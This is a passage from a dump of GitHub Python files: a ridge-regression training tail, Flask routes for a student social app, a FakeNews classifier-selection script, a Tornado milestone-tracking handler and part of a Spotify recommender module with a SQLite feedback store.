len(gammas)]\n\n f = KRRcv([alpha], [gamma])\n t1 = time()\n f.fit(X, y)\n joblib.dump(f, f\"{MODEL_DIR}a_{alpha}_g_{gamma}.pkl\")\n\nelse:\n f = KRRcv(alphas, gammas)\n t1 = time()\n f.fit(X, y)\n joblib.dump(f, f\"{MODEL_DIR}n_{n}.pkl\") \n alpha = f.model.best_params_['alpha']\n gamma = f.model.best_params_['gamma']\n\n\nprint(f'n={n}: {time()-t1: .3f} seconds')\nprint(f'alpha: {alpha}')\nprint(f'gamma: {gamma}')\n\n\n","repo_name":"aufieroma12/floodgate","sub_path":"Hymod/train_krr/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"17569617303","text":"import os\nfrom pdb import post_mortem\nimport random\nfrom urllib import response\nfrom flask import abort, Blueprint, request, render_template, redirect, url_for, flash\nfrom datetime import datetime\nfrom quitter_app.auth.forms import SignUpForm\nfrom quitter_app.models import *\nfrom quitter_app.main.forms import ReactionForm, PostForm, UserForm\nfrom flask_login import login_user, logout_user, login_required, current_user\nfrom quitter_app.extensions import app, db, bcrypt\n\n\nmain = Blueprint(\"main\", __name__)\n\n##########################################\n# MAIN Routes #\n##########################################\n\n@main.route('/')\ndef homepage():\n all_posts = Post.query.all()\n all_users = User.query.all()\n reactions = Reaction.query.all()\n return render_template('home.html', \n all_posts=all_posts, all_users=all_users, reactions=reactions, datetime=datetime, random=random)\n\n@main.route('/profile/')\n@login_required\ndef user_profile(username):\n user = User.query.filter_by(username=username).first()\n posts = Post.query.filter_by(created_by=user).all()\n return render_template('profile.html', user=user, posts=posts, datetime=datetime, random=random)\n\n@main.route('/new_post', methods=['GET', 'POST'])\n@login_required\ndef new_post():\n form = PostForm()\n\n if form.validate_on_submit():\n new_post = Post(\n title=form.title.data,\n audience=form.audience.data,\n body =form.body.data,\n photo_url=form.photo_url.data,\n created_by=current_user,\n )\n db.session.add(new_post)\n db.session.commit()\n\n flash(f'Success! Your post was created successfully.')\n return redirect(url_for('main.homepage'))\n\n\n return render_template('new_post.html', form=form)\n\n@main.route('/post//reaction/add', methods=['GET', 'POST'])\n@login_required\ndef add_reaction(post_id):\n post = Post.query.get(post_id)\n form = ReactionForm(request.form)\n\n if form.validate_on_submit():\n new_reaction = Reaction(\n reaction=form.reaction.data,\n comment=form.comment.data,\n created_by=current_user,\n post=post\n )\n db.session.add(new_reaction)\n db.session.commit()\n\n flash(f'Success! Your reaction was created successfully.')\n return redirect(url_for('main.homepage'))\n\n return render_template('add_reaction.html', form=form, post=post)\n\n@main.route('/user/', methods=['GET', 'POST'])\n@login_required\ndef edit_profile(user_id):\n\n user = User.query.get(user_id)\n\n if user !=current_user:\n abort(403)\n \n form = UserForm(obj=user)\n \n if form.validate_on_submit():\n form.populate_obj(user)\n db.session.add(user)\n db.session.commit()\n\n flash(f'Good News! {user.username} was UPDATED successfully.')\n return redirect(url_for('main.user_profile', username=current_user.username))\n\n return render_template('edit_profile.html', user=user, form=form, datetime=datetime, random=random)\n\n@main.route('/post/', methods=['GET', 'POST'])\n@login_required\ndef edit_post(post_id):\n post = Post.query.get(post_id)\n if post.created_by != current_user:\n abort(403)\n form = PostForm(obj=post)\n\n if form.delete.data:\n return redirect(url_for('main.delete_post', post_id=post.id)) \n\n if form.validate_on_submit():\n form.populate_obj(post)\n db.session.add(post)\n db.session.commit()\n\n flash(f'Good News! Your post was UPDATED successfully.')\n return redirect(url_for('main.homepage'))\n\n return render_template('edit_post.html', post=post, form=form)\n\n@main.route('/post//reaction//edit', methods=['GET', 'POST'])\n@login_required\ndef edit_reaction(post_id, reaction_id):\n reaction = Reaction.query.get_or_404(reaction_id)\n post = reaction.post\n if reaction.created_by != current_user:\n abort(403)\n form = ReactionForm(obj=reaction)\n\n if form.validate_on_submit():\n form.populate_obj(reaction)\n db.session.add(reaction)\n db.session.commit()\n\n flash(f'Good News! Your reaction was UPDATED successfully.')\n return redirect(url_for('main.homepage'))\n\n elif request.method == 'GET':\n form.comment.data = reaction.comment\n\n if reaction is None:\n flash('Reaction does not exist.')\n return redirect(url_for('main.homepage'))\n\n return render_template('edit_reaction.html', title='Edit Reaction', form=form, post=post, reaction=reaction)\n\n@main.route('/delete/', methods=['GET', 'POST'])\n@login_required\ndef delete_post(post_id):\n post = Post.query.get(post_id)\n\n try:\n db.session.delete(post)\n db.session.commit()\n flash('Successfully deleted {} post'.format(post))\n return redirect(url_for('main.homepage'))\n finally:\n flash(' ')\n\n@main.route('/add_friend/', methods=['GET', 'POST'])\n@login_required\ndef add_friend(username):\n new_friend = User.query.filter_by(username=username).first()\n\n if new_friend not in current_user.friend_list and new_friend is not None:\n current_user.friend_list.append(new_friend)\n db.session.commit()\n flash(f'Success! {new_friend.username} has been ADDED to your friend list!') \n return redirect(url_for('main.user_profile', username=new_friend.username)) \n else: \n return (f\"Aw shucks! {new_friend.username} is already in your friend list :)\")\n\n@main.route('/remove_friend/', methods=['POST'])\n@login_required\ndef remove_friend(username):\n user = User.query.filter_by(username=username).first()\n\n if user in current_user.friend_list:\n current_user.friend_list.remove(user)\n db.session.commit()\n flash(f'Success! {user.username} has been REMOVED from your friend list!') \n return redirect(url_for('main.user_profile', username=user.username)) \n else: \n return \"ERROR!\"","repo_name":"alexa-whitney/ACS1220-Quitter-Final-Project","sub_path":"quitter_app/main/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":6034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7514136372","text":"__author__ = 'Noblesse Oblige'\r\nimport numpy as np\r\nfrom sklearn.ensemble import GradientBoostingClassifier\r\nfrom sklearn.ensemble import RandomForestClassifier, ExtraTreesClassifier\r\nfrom sklearn.linear_model import LogisticRegression,SGDClassifier\r\nfrom sklearn.naive_bayes import GaussianNB\r\nfrom sklearn.neural_network import MLPClassifier\r\nfrom sklearn.svm import LinearSVC\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.model_selection import GridSearchCV\r\nfrom sklearn.externals import joblib\r\nfrom sklearn.pipeline import make_pipeline\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.semi_supervised import LabelPropagation\r\n\r\nfrom FakeNews.baseline.fnc_kfold import *\r\nfrom FakeNews.baseline.feature_engineering import *\r\nfrom FakeNews.utils.dataset import *\r\nfrom FakeNews.utils.generate_test_splits import *\r\nfrom FakeNews.utils.score import *\r\nfrom FakeNews.utils.system import *\r\n\r\n\r\n\r\n\r\ncheck_version()\r\nparse_params()\r\n\r\n#Load the training dataset and generate folds\r\nd = DataSet(path=\"fnc_1\")\r\nfolds,hold_out = kfold_split(d,n_folds=10)\r\nfold_stances, hold_out_stances = get_stances_for_folds(d,folds,hold_out)\r\n\r\n# Load the competition dataset\r\ncompetition_dataset = DataSet(\"competition_test\")\r\nX_competition, y_competition = generate_features(competition_dataset.stances, competition_dataset, \"competition\")\r\n\r\nXs = dict()\r\nys = dict()\r\n\r\n# Load/Precompute all features now\r\nX_holdout,y_holdout = generate_features(hold_out_stances,d,\"holdout\")\r\nfor fold in fold_stances:\r\n Xs[fold],ys[fold] = generate_features(fold_stances[fold],d,str(fold))\r\n\r\n\r\n#Deciding which ML\r\n#\r\n# en=ExtraTreesClassifier(n_estimators=200,bootstrap=True,oob_score=True,n_jobs = -1, random_state=14128)\r\n# rf=RandomForestClassifier(n_estimators=200,random_state=None,n_jobs = -1,bootstrap=True,oob_score=True)\r\n# kn1=KNeighborsClassifier(n_neighbors=3,weights='distance')\r\n# kn2=KNeighborsClassifier()\r\n# nb=make_pipeline(StandardScaler(),GaussianNB())\r\n# svm1=LinearSVC(random_state=None,multi_class='crammer_singer')\r\n# svm2=LinearSVC(random_state=14128)\r\n# lr1=LogisticRegression(random_state=14128,multi_class='multinomial',solver='newton-cg')\r\n# lr2=LogisticRegression(penalty='l1')\r\n# sdg=SGDClassifier(tol=1e-4,loss='perceptron', random_state=14128,n_jobs= -1,penalty='elasticnet')\r\n# nn=MLPClassifier(activation='tanh',solver='lbfgs',learning_rate='adaptive',random_state=14128)\r\ngdb = GradientBoostingClassifier(n_estimators=200, random_state=None, verbose=True)\r\n# param=[rf,en,svm1,sdg,nb]\r\n# # for each system\r\n\r\n\r\n#print(\"AAAAAAAAA\",score_defaults(y_competition))\r\np=30\r\n#sub_score=0\r\n#for clf in param:\r\nclf=gdb #joblib.load('fold'+str(31)+'.pkl')\r\nif True:\r\n p=p+1\r\n # Classifier for each fold\r\n best_score = 0\r\n best_fold = None\r\n for fold in fold_stances:\r\n ids = list(range(len(folds)))\r\n del ids[fold]\r\n\r\n X_train = np.vstack(tuple([Xs[i] for i in ids]))\r\n y_train = np.hstack(tuple([ys[i] for i in ids]))\r\n#\r\n X_test = Xs[fold]\r\n y_test = ys[fold]\r\n print(\"test\",score_defaults(y_test))\r\n\r\n # Semi Automated: could not be run as system would feeze\r\n #\r\n # clf = LabelPropagation()\r\n # rng = np.random.RandomState(42)\r\n # random_unlabeled_points = rng.rand(len(y_train)) < 0.3\r\n # labels = np.copy(y_train)\r\n # labels[random_unlabeled_points] = -1\r\n # clf.fit(X_train, labels)\r\n#\r\n#\r\n#finding best params\r\n # GBCparams={'n_estimators':[100,200,300],'min_samples_split':[2,3], 'random_state':[None,14128]}\r\n # gbc = GradientBoostingClassifier()\r\n # clf = GridSearchCV(gbc, GBCparams)\r\n#\r\n# # SVMparams={'multi_class':['ovr','crammer_singer'],'fit_intercept':[True,False],'random_state':[None,14128]}\r\n# # svm=LinearSVC()\r\n# # clf = GridSearchCV(svm, SVMparams)\r\n# #\r\n# # LRparams={'penalty':['l1','l2'],'dual':[False,True], 'fit_intercept':[True,False],'class_weight':['balanced',None],'random_state':[None,14128], 'solver':['newton-cg','lbfgs','liblinear','saga'] ,'multi_class':['ovr','multinomial'], }\r\n# # lr=LogisticRegression()\r\n# # clf = GridSearchCV(lr, LRparams)\r\n# #\r\n #SDGparams={'loss':['hinge','log','modified_huber','squared_hinge','perceptron','huber','squared_loss'],'penalty':[None,'l2','l1','elasticnet'], 'fit_intercept':[True,False],'random_state':[None,14128],'learning_rate':['constant','optimal','invscaling'],'tol':[1e-3,1e-4,1e-5],'eta0':[0.1,0.5,1.0],'average':[True,False]}\r\n #sdg=SGDClassifier()\r\n #clf = GridSearchCV(sdg, SDGparams)\r\n# #\r\n# NNparams={'activation':['logistic','tanh','relu'],'solver':['lbfgs','sgd'],'learning_rate':['constant','invscaling','adaptive'],'random_state':[None,14128]}\r\n# nn=MLPClassifier()\r\n# clf = GridSearchCV(nn, NNparams)\r\n# #\r\n# # NBparams={}\r\n# # nb=GaussianNB()\r\n# # clf = GridSearchCV(nb, NBparams)\r\n# #\r\n# # KNparams={'n_neighbors':[3,4,5,7],'weights':['uniform','distance'],'leaf_size':[30,10,50]}\r\n# # kn=KNeighborsClassifier()\r\n# # clf = GridSearchCV(kn, KNparams)\r\n# #\r\n# # RFparams={'n_estimators':[10,100],'max_features':['auto','log2',None],'oob_score':[False,True],'random_state':[None,14128]}\r\n# # rf=RandomForestClassifier()\r\n# # clf = GridSearchCV(rf, RFparams)\r\n#\r\n clf.fit(X_train, y_train)\r\n print(fold,' ssh ',p)\r\n#\r\n predicted = [LABELS[int(a)] for a in clf.predict(X_test)]\r\n actual = [LABELS[int(a)] for a in y_test]\r\n #\r\n fold_score, _ = score_submission(actual, predicted)\r\n max_fold_score, _ = score_submission(actual, actual)\r\n #\r\n score = fold_score/max_fold_score\r\n #print(\"SCORE::\",score)\r\n print(\"Score for fold \"+ str(fold) + \" was - \" + str(score))\r\n if score > best_score:\r\n best_score = score\r\n best_fold = clf\r\n joblib.dump(clf, 'fold'+str(p)+'.pkl')\r\n\r\n #Run on Holdout set and report the final score on the holdout set\r\n predicted = [LABELS[int(a)] for a in best_fold.predict(X_holdout)]\r\n actual = [LABELS[int(a)] for a in y_holdout]\r\n print(\"Dev\",score_defaults(actual))\r\n print(\"Scores on the dev set\")\r\n report_score(actual,predicted)\r\n print(\"\")\r\n print(\"\")\r\n\r\n #Run on competition dataset\r\n predicted = [LABELS[int(a)] for a in best_fold.predict(X_competition)]\r\n actual = [LABELS[int(a)] for a in y_competition]\r\n print(\"Comp\",score_defaults(actual))\r\n\r\n print(\"Scores on the test set\")\r\n report_score(actual,predicted)\r\nprint(\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\")\r\n#\r\nfor i in range(1,26):\r\n try:\r\n best_fold = joblib.load('fold'+str(i)+'.pkl')\r\n\r\n #Run on Holdout set and report the final score on the holdout set\r\n predicted = [LABELS[int(a)] for a in best_fold.predict(X_holdout)]\r\n actual = [LABELS[int(a)] for a in y_holdout]\r\n print(\"Dev\",i,score_defaults(actual))\r\n print(\"Scores on the dev set\")\r\n report_score(actual,predicted)\r\n print(\"\")\r\n print(\"\")\r\n\r\n #Run on competition dataset\r\n predicted = [LABELS[int(a)] for a in best_fold.predict(X_competition)]\r\n actual = [LABELS[int(a)] for a in y_competition]\r\n print(\"Comp\",i,score_defaults(actual))\r\n\r\n print(\"Scores on the test set\")\r\n report_score(actual,predicted)\r\n#\r\n#\r\n# Xs[len(folds)]=X_holdout\r\n# ys[len(folds)]=y_holdout\r\n# ids = list(range(len(folds)+1))\r\n# X_train = np.vstack(tuple([Xs[i] for i in ids]))\r\n# y_train = np.hstack(tuple([ys[i] for i in ids]))\r\n#\r\n# best_fold.fit(X_train,y_train)\r\n# #Run on competition dataset\r\n# predicted = [LABELS[int(a)] for a in best_fold.predict(X_competition)]\r\n# actual = [LABELS[int(a)] for a in y_competition]\r\n#\r\n# print(\"Scores on the test set (full train)\")\r\n# report_score(actual,predicted)\r\n#\r\n except:\r\n pass\r\n","repo_name":"Kibanos/FakeNewsProject","sub_path":"MLSelection.py","file_name":"MLSelection.py","file_ext":"py","file_size_in_byte":8116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"33465139341","text":"# -*- coding: utf-8 -*-\nfrom Pagination import Pagination\nimport tornado\nfrom handlers.base import BaseHandler\nimport uuid, os, datetime\nfrom tornado.options import define, options\nimport msg\nimport json\nimport events\n\nclass MilePostHandler(BaseHandler):\n def get(self):\n id = self.get_argument(\"id\")\n guid = self.get_argument(\"guid\")\n\n tag = self.get_argument(\"tag\",\"milepost_project\")\n if tag ==\"milepost_project\":\n btypeid= self.get_argument(\"btypeid\")\n\n project_cq = self.db.query(\"select * from t_projects_member where project_id=%s and team_id=38\",id)\n project_btypes = self.db.query(\n \"select * from t_projects_type where income_category='业务分类'\",\n )\n project_milepost = self.db.query(\"select * from t_projects_milepost where project_id=%s\",id)\n t_project = self.db.get('select * from t_projects where id=%s',id)\n project_milepost_item = self.db.get(\n 'select * from t_projects_type where id=%s', btypeid)\n project_milepost_type = self.db.query(\n \"select *,b.order_int border_int from t_projects_type a inner join t_projects_milepost b on b.type_id=a.id where income_category='办结' and project_id=%s order by b.order_int\",id\n )\n\n\n\n return self.render(\n \"milepost/milepost_project.html\",\n project_milepost_type=project_milepost_type,\n project_milepost_item=project_milepost_item,\n search_key=\"\",\n t_project=t_project,\n project_milepost=project_milepost,\n project_btypes=project_btypes,\n project_cq=project_cq)\n\n\n\n def post(self):\n tag = self.get_argument(\"tag\")\n uid = self.get_secure_cookie(\"uid\")\n uid_name = self.get_secure_cookie(\"name\")\n dt=datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n # print \"mile\", tag\n if tag == \"confirm\":\n mid = self.get_argument(\"mid\",0)\n mp_id = self.get_argument(\"mp_id\")\n guid = self.get_argument(\"guid\")\n project_id = self.get_argument(\"project_id\")\n update_id = self.get_argument(\"update_id\",0)\n is_close = self.get_argument(\"is_close\")\n btype_id_name=self.get_argument('btype_id_name','')\n milepost = self.db.get(\"select * from t_projects_milepost where id=%s\",mp_id)\n customer_id=self.get_argument('customer_id','0')\n bresult = 1\n # print \"milepost===============\",\n if not milepost:\n self.write(\"not milepost\")\n else:\n t_project=self.db.get('''\n select * from t_projects where customer_company!='' and company_uid!='' and comany_person!='' and true_reg_addr!=''\n and company_created_day is not null and (company_expired_day is not null or company_fever!=0) and city!='' and zone!='' and id=%s\n ''',project_id)\n\n\n if milepost.type_name==u'填写办结信息':\n t_projects_transfile = self.db.get('''\n select * from t_projects_transfile where project_id=%s and pm_id=%s and mtype=1\n ''', project_id, milepost.member_id)\n if not t_projects_transfile:\n return self.write(\"wrong_tran\")\n elif not t_project and btype_id_name!=\"公司注销\":\n # print \"l.......1\"\n return self.write(\"-100\") #需要补资料\n elif milepost.type_name==u'仓管通知销售交接':\n t_projects_transfile = self.db.get('''\n select * from t_projects_transfile where project_id=%s and pm_id=%s and mtype=1 and cq_uid =0\n ''', project_id, milepost.member_id)\n # t_projects_transfile_sales = self.db.get('''\n # select * from t_projects_transfile where project_id=%s and pm_id=%s and mtype=2\n # ''', project_id, milepost.member_id)\n if t_projects_transfile:\n return self.write(\"not_confirm_cg\") #仓管没有确认\n\n # elif not t_projects_transfile_sales:\n # return self.write(\"wrong_tran_sales\")\n elif not t_project and btype_id_name!=\"公司注销\":\n # print \"l.......2\", btype_id_name\n return self.write(\"-100\") #需要补资料\n\n\n else:\n if is_close == \"1\":\n t_projects_type = self.db.get(\n \"select * from t_projects_type where income_name='仓管确认交接完成'\"\n )\n if not t_projects_type:\n return self.write(\"not t_projects_type\")\n\n bresult = self.db.execute(\"\"\"\n update t_projects_milepost set confirm_at=%s,uid=%s,uid_name=%s where id=%s \n \"\"\", dt, uid, uid_name, mp_id)\n\n if bresult == 0:\n bresult = self.db.execute(\n \"\"\"\n update t_projects_milepost set is_close=1\n where member_id=%s and project_id=%s \n \"\"\", milepost.member_id,\n project_id)\n\n bresult = self.db.execute(\n \"\"\"\n update t_projects_milepost set confirm_at=%s,uid=%s,uid_name=%s\n where member_id=%s and project_id=%s and order_int=8\n \"\"\", dt, uid, uid_name, milepost.member_id,project_id)\n\n bresult = self.db.execute(\n \"\"\" update t_projects_member set\n last_milepost_id=%s ,\n last_milepost_id_name=%s , \n last_milepost_id_at=%s ,\n is_close=1\n where mid=%s and project_id=%s \n \"\"\", t_projects_type.id,\n t_projects_type.income_name,\n dt,\n milepost.member_id,\n project_id)\n \n \n return self.write(str(bresult))\n elif milepost.type_name == u'仓管确认交接完成':\n if mid :\n self.db.execute(\"\"\"\n update t_projects_transition set rec_by_uid_at=%s where project_id=%s and mid=%s and is_customer=1\n \"\"\",dt,project_id,mid)\n \n # elif milepost.type_name==u\"销售顾问接受交接\":\n # t_projects_transfile = self.db.get('''\n # select * from t_projects_transfile where project_id=%s and pm_id=%s and mtype=2 and cq_uid != 0\n # ''', project_id, mid) # 检查\n # if not t_projects_transfile:\n # return self.write(\"not_confirm_sales\")\n\n t_project1=self.db.get('''\n select aa.* from (\n select \n ifnull(((all_income+ifnull(other_money,0)) -( ifnull(b.income_money,0)+ifnull(daishou_money,0))),0) qk\n from t_projects a \n left join (select b1.project_id,ifnull(sum(income_money),0) income_money from t_projects_income b1 ,t_projects_income_title b2 where\n b1.parent_id=b2.id and income_id <=43 and income_uid > 0 group by b1.project_id) b \n on a.id=b.project_id \n left join (select project_id,ifnull(sum(income_money),0) other_money from t_projects_income_other group by project_id) c \n on a.id=c.project_id \n left join (select e1.project_id,ifnull(sum(income_money),0) daishou_money from t_projects_income e1,t_projects_income_title e2 where \n e1.parent_id=e2.id and \n income_id >43 and income_uid > 0 group by e1.project_id) e \n on a.id=e.project_id where a.id=%s\n group by a.id) aa where qk <> 0\n \n ''',project_id)\n\n bresult = self.db.execute(\"\"\"\n update t_projects_milepost set confirm_at=%s,uid=%s,uid_name=%s where id=%s \n \"\"\", dt, uid, uid_name, mp_id)\n \n if t_project1 and milepost.type_name=='办结':\n if t_project1.qk!=0:\n self.db.execute('''\n update t_projects set is_finance_project=1 where id=%s\n ''',project_id)\n\n\n self.db.execute(\n \"\"\"update t_projects_member set last_milepost_id=%s ,\n last_milepost_id_name=%s , last_milepost_id_at=%s where mid=%s \"\"\",\n milepost.type_id, milepost.type_name, dt,\n milepost.member_id)\n \n t_projects_member = self.db.get(\n \" select * from t_projects_member where mid=%s and project_id=%s\",\n milepost.member_id, project_id)\n if t_projects_member:\n if milepost.type_name != u'待接单' or milepost.type_name != u'办理中' and t_projects_member.btype_id_name==u\"公司注册\" :\n self.db.execute(\n \"update t_projects set reg_state=2 where id=%s\",\n project_id)\n events.add_project_event(self, project_id,'订单流转('+milepost.btype_name+')',milepost.type_name,\n uid, uid_name,customer_id)\n\n return self.write(str(bresult))\n elif tag == \"group_confirm\": #批量接单\n mid = self.get_argument(\"mid\")\n\n result =1\n for item in mid.split(\",\"):\n # print \"item\",item\n milepost = self.db.query(\n \"select * from t_projects_milepost where member_id=%s and confirm_at is null and (order_int=1 or order_int=2) order by order_int \",\n item)\n for row in milepost:\n bresult = self.db.execute(\"\"\"\n update t_projects_milepost set \n confirm_at=%s,uid=%s,uid_name=%s \n where id=%s \n \"\"\", dt, uid, uid_name, row.id)\n # print \"bresult\", bresult, \"row.id0\", row.id\n if row.order_int == 2:\n\n self.db.execute(\n \"\"\"update t_projects_member set last_milepost_id=%s ,\n last_milepost_id_name=%s , last_milepost_id_at=%s where mid=%s and project_id=%s\"\"\",\n row.type_id, row.type_name, dt, item,\n row.project_id)\n self.write(str(result))\n elif tag == \"group_confirm_other\":\n mid = self.get_argument(\"mid\")\n type_name = self.get_argument(\"type_name\")\n result = 1\n for item in mid.split(\",\"):\n # print item,type_name,\".....\"\n milepost = self.db.query(\n \"select * from t_projects_milepost where member_id=%s and confirm_at is null and (type_name=%s) order by order_int \",\n item, type_name)\n for row in milepost:\n # print item,type_name,\".....\",row\n bresult = self.db.execute(\"\"\"\n update t_projects_milepost set \n confirm_at=%s,uid=%s,uid_name=%s \n where id=%s \n \"\"\", dt, uid, uid_name, row.id)\n if bresult ==0:\n result = self.db.execute(\n \"\"\"update t_projects_member set last_milepost_id=%s ,\n last_milepost_id_name=%s , last_milepost_id_at=%s where mid=%s and project_id=%s\"\"\",\n row.type_id, row.type_name, dt, item,row.project_id)\n if result==0:\n self.db.execute(\"update t_projects set category_id=0 ,category_id_name=NULL where id=%s\",row.project_id)\n\n self.write(str(result))\n elif tag == \"reset_category\":\n category_id = self.get_argument(\"category_id\")\n if not category_id:\n self.write(\"not category_id\")\n else:\n result = self.db.execute(\n \"update t_projects set category_id=0 ,category_id_name=NULL where category_id=%s \",\n category_id)\n self.write(str(result))\n\n elif tag ==\"update_remark\":\n mp_id = self.get_argument(\"mp_id\")\n guid = self.get_argument(\"guid\")\n remark = self.get_argument(\"milepost_remark\",\"\")\n dt=datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n project_id = self.get_argument(\"project_id\")\n result = self.db.execute(\"\"\"\n update t_projects_milepost set confirm_at=%s,remark=%s where id=%s and project_id=%s\n \"\"\",dt,remark, mp_id,project_id)\n self.write(str(result))\n","repo_name":"huangcun666/h_pyincome","sub_path":"handlers/milepost.py","file_name":"milepost.py","file_ext":"py","file_size_in_byte":14202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"38672632462","text":"import os\nimport re\nimport base64\nimport datetime\nimport platform\nfrom numpy.core.arrayprint import format_float_positional\nimport requests\nimport spotipy\nimport time\nimport random\nimport pickle\nimport sqlite3\nfrom sqlite3 import Error\nimport numpy as np\nimport pandas as pd\nimport plotly.express as px\nfrom urllib.parse import urlencode\nfrom urllib.request import urlopen\nfrom spotipy.oauth2 import SpotifyOAuth, SpotifyClientCredentials\nfrom scipy.spatial.distance import cdist\nimport seaborn as sns\nfrom dotenv import load_dotenv\n\nfrom wordcloud import WordCloud\nimport matplotlib.pyplot as plt\n\n\ncwd = os.getcwd()\n\n#import sys\n#sys.path.insert(1, cwd)\n#import config\n# Spotify Credentials\n#os.environ[\"SPOTIPY_CLIENT_ID\"] = config.SPOTIPY_CLIENT_ID\n#os.environ[\"SPOTIPY_CLIENT_SECRET\"] = config.SPOTIPY_CLIENT_SECRET\n#os.environ['SPOTIPY_REDIRECT_URI'] = config.SPOTIPY_REDIRECT_URI # Needed for user authorization\n#print(\"STS\", st.secrets[\"SPOTIPY_CLIENT_ID\"])\n# load_dotenv()\n\n\n\n# SPOTIPY_CLIENT_ID = os.getenv('SPOTIPY_CLIENT_ID')\n\n# SPOTIPY_CLIENT_SECRET = os.getenv('SPOTIPY_CLIENT_SECRET')\n\n# SPOTIPY_REDIRECT_URI = os.getenv('SPOTIPY_REDIRECT_URI')\n\n\n\n\n# # Defining scope to read user playlist and write playlist to user\n\n# scope = 'user-library-read user-follow-read playlist-modify-private playlist-modify user-top-read'\n\n# spotify = spotipy.Spotify(auth_manager=SpotifyOAuth(scope=scope))\n\nlog_filename = os.path.join(cwd, 'data', 'read_spotify_mpd_log.txt')\nfeedback_db_file = os.path.join(cwd, 'data', 'user_feedback.db')\n\n# Pickled models\nmodel_path = '../model/KMeans_K17_20000_sample_model.sav'\ntsne_path = '../model/openTSNETransformer.sav'\nscaler_path = '../model/StdScaler.sav'\nplaylists_db_path = '../data/spotify_20K_playlists.db'\ntrain_data_scaled_path = '../data/scaled_data.csv'\nopenTSNE_path = '../data/openTSNE_20000.csv'\n\ndef get_public_ip():\n try:\n data = str(urlopen('http://checkip.dyndns.com/').read())\n # data = 'Current IP CheckCurrent IP Address: 65.96.168.198\\r\\n'\n ip = re.compile(r'Address: (\\d+\\.\\d+\\.\\d+\\.\\d+)').search(data).group(1)\n except:\n ip = ''\n return ip\n\ndef get_num_tracks_fig(opt='total', rows=200):\n with open(log_filename) as log_file:\n playlist_files = []\n new_tracks = []\n req_tracks = []\n for line in log_file:\n line = line.strip()\n if 'File: data/mpd.slice' in line:\n playlist_files.append(line.split('.')[-2])\n if 'Created new track_ids' in line:\n new_tracks.append(int(line.split(':')[1].rstrip()))\n if opt == 'total':\n mode = 'overlay'\n if 'Total tracks/ratings in this file' in line:\n req_tracks.append(int(line.split(':')[1].rstrip()))\n else:\n mode = 'stack'\n if 'Tracks already exist' in line:\n req_tracks.append(int(line.split(':')[1].rstrip()))\n\n req_tracks_df = pd.DataFrame(zip(playlist_files, req_tracks), columns=['files', 'num of tracks'])\n req_tracks_df['tracks'] = opt\n new_tracks_df = pd.DataFrame(zip(playlist_files, new_tracks), columns=['files', 'num of tracks'])\n new_tracks_df['tracks'] = 'new'\n tracks_df = pd.concat([req_tracks_df.iloc[:rows], new_tracks_df.iloc[:rows]])\n \n fig = px.bar(tracks_df,\n x='files',\n y='num of tracks',\n color='tracks',\n barmode=mode)\n return fig\n\nclass User_FeedbackDB():\n db_file = None\n conn = None\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.db_file = feedback_db_file\n self.create_connection()\n self.create_table()\n\n def create_connection(self):\n \"\"\" create a database connection to the SQLite database specified by db_file\n :return: None\n \"\"\"\n try:\n self.conn = sqlite3.connect(self.db_file)\n except Error as e:\n print(e)\n\n def create_table(self):\n \"\"\" create a feedback table\n :return: None\n \"\"\"\n try:\n sql_create_table_feedback = \"\"\" CREATE TABLE IF NOT EXISTS feedback (\n hostname text NOT NULL,\n user_ip text NOT NULL,\n feedback text NOT NULL,\n rec_type text NOT NULL,\n rec_name text NOT NULL,\n ml_model_options text,\n username text\n ); \"\"\"\n cur = self.conn.cursor()\n cur.execute(sql_create_table_feedback)\n except Error as e:\n print(e)\n print('Failed to create feedback table')\n\n def check_feedback_exists(self, feedback):\n \"\"\"\n Query feedback by user_ip, rec_name, ml_model_options, username\n :param feedback_list:\n :return: True/False\n \"\"\"\n cur = self.conn.cursor()\n cur.execute(\"SELECT feedback FROM feedback WHERE user_ip=? and rec_name=? and ml_model_options=? and username=?\", (feedback[1], feedback[4], feedback[5], feedback[6]))\n rows = cur.fetchall()\n feedback_exists = False\n if len(rows) > 0:\n feedback_exists = True\n return feedback_exists\n\n def add_user_feedback(self, feedback):\n \"\"\"\n Add a new feedback\n :param feedback list:\n :return: None\n \"\"\"\n hostname = platform.node()\n user_ip = get_public_ip()\n data_tuple = tuple([hostname, user_ip] + feedback)\n if self.check_feedback_exists(data_tuple):\n return\n sql = ''' INSERT INTO feedback(hostname, user_ip, feedback, rec_type, rec_name, ml_model_options, username)\n VALUES(?,?,?,?,?,?,?) '''\n try:\n cur = self.conn.cursor()\n cur.execute(sql, data_tuple)\n self.conn.commit()\n except:\n print('Failed to add feedback')\n\n def get_feedback_plot(self):\n feedback_df = pd.read_sql('select feedback, rec_type from feedback', self.conn)\n fig = None\n if len(feedback_df) > 0:\n feedback_df = feedback_df.value_counts().reset_index().rename(columns={0: 'count'})\n fb_order = {'Love it': 0, 'Like it': 1, 'Okay': 2, 'Hate it': 3}\n feedback_df = feedback_df.sort_values(by='feedback', key=lambda x: x.map(fb_order))\n fig = px.bar(feedback_df,\n y='count',\n x='feedback',\n color='rec_type',\n barmode='group')\n return fig\n\n def get_all_feedbacks_df(self):\n all_feedbacks_df = pd.read_sql('select * from feedback', self.conn)\n return all_feedbacks_df\n\n def add_feedback_df(self, feedback_df):\n feedback_df.to_sql(name='feedback', con=self.conn, if_exists='replace', index=False)\n\nclass SPR_ML_Model():\n def __init__(self):\n \"\"\"\n Inits class with hard coded values for the Spotify instance and gets the paths for all the models and data\n \"\"\"\n # Model loading\n self.model = pickle.load(open(model_path, 'rb'))\n self.tsne_transformer = pickle.load(open(tsne_path, 'rb'))\n self.scaler = pickle.load(open(scaler_path, 'rb'))\n\n # Data loading\n self.playlists_db = 